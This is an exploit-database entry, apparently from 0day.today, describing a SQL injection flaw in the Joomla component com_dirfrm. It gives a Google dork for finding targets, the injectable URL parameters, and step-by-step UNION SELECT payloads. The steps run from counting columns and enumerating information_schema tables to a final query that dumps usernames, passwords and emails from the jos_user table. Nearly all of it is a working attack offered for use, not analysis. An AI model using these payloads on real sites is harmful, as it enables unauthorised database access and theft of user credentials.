Joomla Component com_dirfrm Sql Injection Vulnerability

2010-08-18T00:00:00
ID 1337DAY-ID-12309
Type zdt
Reporter Hieuneo
Modified 2010-08-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================================
Joomla Component com_dirfrm Sql Injection Vulnerability
=======================================================

# Author : Hieuneo (Vietnam)
# Version : All Versions
# Tested on : Win 7 Home
 
###############################################
Dork google: inurl:"com_dirfrm"
###############################################
Exploit:
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL
Injection]&id=8&Itemid=32
or
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL
Injection]&Itemid=32
###############################################
[SQL Injection]:
-> Step1:
- order by n--- False
- order by n+1-- True
 
-> Step2:null  Union select 1,2,3,4,...,n+1--
Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null
union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32
 
-> Step3: replace display number on website
version(), user(), database
#if version SQL >=5 : try exploit with table system:
___table_name from information_scheama.tables where table_schema=database()--
___column_name form information_schema.columns where table_name=Char(name table)
#if version SQL <5: try exploit with blind SQL, blind table_name and column_name
 
-> Step 4: collecting information
 
null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--
 
Done!
#############[email protected]################
--
Hieuneo



#  0day.today [2018-01-09]  #